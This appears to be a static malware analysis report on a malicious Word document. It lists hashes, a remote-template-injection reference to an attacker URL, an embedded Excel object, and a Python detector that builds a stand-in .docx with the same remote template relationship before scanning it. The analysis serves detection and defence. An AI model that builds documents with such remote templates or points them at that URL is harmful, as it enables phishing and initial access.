Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 e4cc77d1bb798367…

MALICIOUS

Office (OOXML) / .DOC

Size: 121.7 KB
Created: 2023-09-02 09:41:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2023-09-13
MD5: b4dbd4f66804dc194f2626c4e5811708
SHA-1: 448f02dc8007563984690acd31fc408698b9245c
SHA-256: e4cc77d1bb798367aeae40d6cc54f69b6326b7faf249323f49b993aa3f32c00b
Risk score: 82

Malware Insights

MITRE ATT&CK
T1204 User Execution (T1204.001 Malicious Link)  T1059 Command and Scripting Interpreter  T1221 Template Injection (covers the remote-template relationship below)

The sample carries a remote template reference (an attachedTemplate relationship in word/_rels/settings.xml.rels pointing at https://mub.me/CE4D) and an embedded OLE part (an Excel worksheet). Word resolves the template reference itself when the document is opened outside Protected View, so the external URL is contacted with no click required; a template fetched that way is the usual carrier for a macro or other second-stage payload, a common initial-access technique. The content served by the URL was not retrieved during this static analysis, so the second stage itself is unknown.

Heuristics (4)

  • Remote template injection [high] OOXML_REMOTE_TEMPLATE
    Document references a remote template URL (https://mub.me/CE4D), a common remote-template-injection vector used by Hancitor, Emotet and many phishing campaigns. Word fetches and applies the remote template automatically once the file is out of Protected View, so the URL is contacted before any macro prompt; macros in the fetched template may then execute depending on Office policy and trust state.
  • External relationship [medium] OOXML_EXTERNAL_REL
    External target (TargetMode="External") in word/_rels/settings.xml.rels: https://mub.me/CE4D
  • Embedded OLE object [medium] OOXML_OLE_OBJECT
    Document contains an embedded OLE part (word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx). The part is itself an OOXML package, so it should be unpacked and checked in its own right; in particular, inspect its [Content_Types].xml for a macro-enabled main part rather than trusting the .xlsx extension.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://mub.me/CE4D

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: ooxml_oleobject_00.bin
SHA-256: c600fab7b32c6c108dad586fce3e15cf04274d8c14c45cbf3783a290a447d6b0
Kind: ooxml-ole-object
Source: OOXML embedded OLE part: word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx
Size: 25979 bytes
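The checks behind the heuristics and the artifact listing above can be reproduced directly from the OOXML package: every relationship with TargetMode="External" in any .rels part, an attachedTemplate relationship among them flagged as remote template injection, and every part under word/embeddings/ reported with its container type. The script below is an added example, not the scanner's own code. It builds a constructed minimal .docx in memory that carries only the two indicators from this report (the external attachedTemplate relationship to https://mub.me/CE4D and a placeholder embedded part named as in the artifact list); the placeholder bytes, the function names and the rule-to-severity mapping are assumptions made for the example, not taken from the analysed sample.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound file signature


def build_sample_docx() -> bytes:
    """Constructed stand-in for the sample (not the analysed file): a minimal OOXML
    package carrying a remote attachedTemplate relationship in
    word/_rels/settings.xml.rels and one embedded part under word/embeddings/."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
        'Target="https://mub.me/CE4D" TargetMode="External"/>'
        "</Relationships>"
    )
    document_rels = (
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", document_rels)
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
        # Placeholder bytes with a zip signature: a real embedded .xlsx is itself an OOXML package.
        z.writestr("word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx", b"PK\x03\x04" + b"\x00" * 60)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Return (rels_part, relationship_type, target) for every relationship whose
    TargetMode is External, scanning every .rels part in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed rels part: skip it rather than abort the scan
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]  # e.g. attachedTemplate, hyperlink, oleObject
                found.append((name, rel_type, rel.get("Target", "")))
    return found


def embedded_parts(docx_bytes: bytes):
    """Return (part_name, size, container_kind) for every part under word/embeddings/,
    classifying the container by magic bytes instead of by file extension."""
    parts = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if not info.filename.startswith("word/embeddings/"):
                continue
            head = z.read(info.filename)[:8]
            if head.startswith(b"PK\x03\x04"):
                kind = "ooxml-package"  # embedded .xlsx/.docx/.pptx: unpack and scan recursively
            elif head == CFB_MAGIC:
                kind = "ole-cfb"        # legacy OLE compound file (.xls, .doc, Packager objects)
            else:
                kind = "unknown"
            parts.append((info.filename, info.file_size, kind))
    return parts


def heuristics(docx_bytes: bytes):
    """Derive the four heuristic labels used in the report from the raw indicators.
    Severities follow the report; the rule names are reused as plain strings."""
    hits, urls = [], []
    for part, rel_type, target in external_relationships(docx_bytes):
        hits.append(("OOXML_EXTERNAL_REL", "medium", f"{part}: {target}"))
        if rel_type == "attachedTemplate":
            hits.append(("OOXML_REMOTE_TEMPLATE", "high", f"{part}: {target}"))
        if target.lower().startswith(("http://", "https://")) and target not in urls:
            urls.append(target)
    for name, size, kind in embedded_parts(docx_bytes):
        hits.append(("OOXML_OLE_OBJECT", "medium", f"{name} ({kind}, {size} bytes)"))
    for url in urls:
        hits.append(("EMBEDDED_URL", "info", url))
    return hits


if __name__ == "__main__":
    for rule, severity, detail in heuristics(build_sample_docx()):
        print(f"{rule:22} {severity:7} {detail}")
```

Run against a real file by replacing build_sample_docx() with the bytes of the document; the relationship scan deliberately covers every .rels part, not just settings.xml.rels, because the same TargetMode="External" pattern appears in document.xml.rels for remote OLE objects and hyperlinks. Classifying embedded parts by magic bytes is what distinguishes an embedded OOXML package (which needs a recursive scan) from a legacy OLE compound file (which needs an OLE stream parser).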